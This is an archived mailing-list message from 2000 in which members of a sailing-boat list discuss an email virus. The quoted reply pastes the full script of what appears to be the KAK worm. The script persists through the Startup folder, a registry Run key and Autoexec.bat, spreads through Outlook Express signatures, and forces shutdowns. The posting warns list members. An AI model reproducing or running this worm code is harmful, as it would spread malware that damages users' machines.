Virus (was Re: [alberg30] A30 article-huge file)
alberg30
alberg30 at interactive.net
Fri Apr 14 19:48:18 PDT 2000
George, how do I turn off scripts? Althougg I got an email msg that said
there was a virus in the email I sent, I have done a virus scan of my
hard drive but show no sign of the virus. What gives?
----- Original Message -----
From: George Dinwiddie <gdinwiddie at min.net>
To: <alberg30 at egroups.com>
Cc: <support at egroups.com>
Sent: Friday, April 14, 2000 8:45 PM
Subject: Virus (was Re: [alberg30] A30 article-huge file)
> Joe,
>
> Your email contained the same virus that appeared in Towney's
> email on the A30 list. It shows up right above the ad banner
> in the HTML source. I'm beginning to think that perhaps it's
> not your machine and Towney's machine, but egroups' server
> that's infected.
>
> Please, everyone make sure that scripts are turned off in your
> email software. I can't imagine any reason you'd want an
> email to automatically run something on your machine.
>
> - George
>
>
> --------------script source--------------
> function sErr(){return
> true;}window.onerror=3DsErr;scr.Reset();scr.doc=3D"Z=
> <HTML><HEAD><TITLE>Driver Memory Error</"+"TITLE><HTA:APPLICATION
> ID=3D\"hO=
> \" WINDOWSTATE=3DMinimize></"+"HEAD><BODY BGCOLOR=3D#CCCCCC><object
> id=3D'w=
> sh'
>
classid=3D'clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></"+"object><SCR=
> IPT>function sEr(){self.close();return
> true;}window.onerror=3DsEr;fs=3Dnew =
>
ActiveXObject('Scripting.FileSystemObject');wd=3D'C:\\\\Windows\\\\';fl=
3Df=
> s.GetFolder(wd+'Applic~1\\\\Identities');sbf=3Dfl.SubFolders;for(var
> mye=3D=
> new
> Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=3Dmye.item();ids=3Dnew
=
>
String(idd);idn=3Dids.slice(31);fic=3Didn.substring(1,9);kfr=3Dwd+'MENUD
=C9=
>
~1\\\\PROGRA~1\\\\D=C9MARR~1\\\\kak.hta';ken=3Dwd+'STARTM~1\\\\Programs\
\\\=
>
StartUp\\\\kak.hta';k2=3Dwd+'System\\\\'+fic+'.hta';kk=3D(fs.FileExists(
kfr=
> ))?kfr:ken;aek=3D'C:\\\\AE.KAK';aeb=3D'C:\\\\Autoexec.bat';if(!fs.File
Exist=
>
s(aek)){re=3D/kak.hta/i;if(hO.commandLine.search(re)!=3D-1){f1=3Dfs.GetF
ile=
>
(aeb);f1.Copy(aek);t1=3Df1.OpenAsTextStream(8);pth=3D(kk=3D=3Dkfr)?wd+'M
ENU=
> D=90~1\\\\PROGRA~1\\\\D=90MARR~1\\\\kak.hta':ken;t1.WriteLine('@echo
> off>'+=
> pth);t1.WriteLine('del
> '+pth);t1.Close();}}if(!fs.FileExists(k2)){fs.CopyFi=
>
le(kk,k2);fs.GetFile(k2).Attributes=3D2;}t2=3Dfs.CreateTextFile(wd+'kak.
reg=
>
');t2.write('REGEDIT4');t2.WriteBlankLines(2);ky=3D'[HKEY_CURRENT_USER\\
\\I=
> dentities\\\\'+idn+'\\\\Software\\\\Microsoft\\\\Outlook
> Express\\\\5.0';sg=
> =3D'\\\\signatures';t2.WriteLine(ky+sg+']');t2.Write('\"Default
> Signature\"=
>
=3D\"00000000\"');t2.WriteBlankLines(2);t2.WriteLine(ky+sg+'\\\\00000000
]')=
> ;t2.WriteLine('\"name\"=3D\"Signature
> #1\"');t2.WriteLine('\"type\"=3Ddword=
>
:00000002');t2.WriteLine('\"text\"=3D\"\"');t2.Write('\"file\"=3D\"C:\\\
\\\=
>
\\WINDOWS\\\\\\\\kak.htm\"');t2.WriteBlankLines(2);t2.WriteLine(ky+']');
t2.=
> Write('\"Signature
> Flags\"=3Ddword:00000003');t2.WriteBlankLines(2);t2.Writ=
>
eLine('[HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Curren
tVe=
>
rsion\\\\Run]');t2.Write('\"cAg0u\"=3D\"C:\\\\\\\\WINDOWS\\\\\\\\SYSTEM\
\\\=
>
\\\\'+fic+'.hta\"');t2.WriteBlankLines(2);t2.close();wsh.Run(wd+'Regedit
.ex=
> e -s
>
'+wd+'kak.reg');t3=3Dfs.CreateTextFile(wd+'kak.htm',1);t3.Write('<HTML=
> ><BODY><DIV
style=3D\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OB=
> JECT classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC
> id=3Dscr></"+"OBJ=
>
ECT></"+"DIV>');t4=3Dfs.OpenTextFile(k2,1);while(t4.Read(1)!=3D'Z');t3.W
rit=
> eLine('<SCRIPT><!--');t3.write('function sErr(){return
> true;}window.onerror=
>
=3DsErr;scr.Reset();scr.doc=3D\"Z');rs=3Dt4.Read(3095);t4.close();rd=3D/
\\\=
>
\/g;re=3D/\"/g;rf=3D/<\\//g;rt=3Drs.replace(rd,'\\\\\\\\').replace(re,'\
\\\=
>
\"').replace(rf,'</"+"\"+\"');t3.WriteLine(rt+'\";la=3D(navigator.system
Lan=
>
guage)?navigator.systemLanguage:navigator.language;scr.Path=3D(la=3D=3D\
"fr=
> \")?\"C:\\\\\\\\windows\\\\\\\\Menu
> D=E9marrer\\\\\\\\Programmes\\\\\\\\D=
> =E9marrage\\\\\\\\kak.hta\":\"C:\\\\\\\\windows\\\\\\\\Start
> Menu\\\\\\\\Pr=
>
ograms\\\\\\\\StartUp\\\\\\\\kak.hta\";agt=3Dnavigator.userAgent.toLower
Cas=
>
e();if(((agt.indexOf(\"msie\")!=3D-1)&&(parseInt(navigator.appVersion)>4
))|=
> |(agt.indexOf(\"msie
> 5.\")!=3D-1))scr.write();');t3.write('//--></"+"'+'SCR=
>
IPT></"+"'+'OBJECT></"+"'+'BODY></"+"'+'HTML>');t3.close();fs.GetFile(wd
+'k=
> ak.htm').Attributes=3D2;fs.DeleteFile(wd+'kak.reg');d=3Dnew
> Date();if(d.get=
> Date()=3D=3D1 && d.getHours()>17){alert('Kagou-Anti-Kro$oft says not
> today =
> !');wsh.Run(wd+'RUNDLL32.EXE
> user.exe,exitwindows');}self.close();</"+"SCRI=
> PT>S3 driver memory alloc failed
> !]]%%%%%</"+"BODY></"+"HTML>";la=3D=
>
(navigator.systemLanguage)?navigator.systemLanguage:navigator.language;s
cr.=
> Path=3D(la=3D=3D"fr")?"C:\\windows\\Menu
> D=E9marrer\\Programmes\\D=E9marrag=
> e\\kak.hta":"C:\\windows\\Start
> Menu\\Programs\\StartUp\\kak.hta";agt=3Dnav=
>
igator.userAgent.toLowerCase();if(((agt.indexOf("msie")!=3D-1)&&(parseIn
t(n=
> avigator.appVersion)>4))||(agt.indexOf("msie 5.")!=3D-1))scr.write();
>
> ----------------------------------------------------------------------
--
> You can win $1000!
> Time-limited offer. Enter today at:
> http://click.egroups.com/1/2864/5/_/476031/_/955762890/
> ----------------------------------------------------------------------
--
>
>
------------------------------------------------------------------------
Get your bargains at AndysGarage.com!
http://click.egroups.com/1/2579/5/_/476031/_/955764082/
------------------------------------------------------------------------
955766898.0
More information about the Public-List
mailing list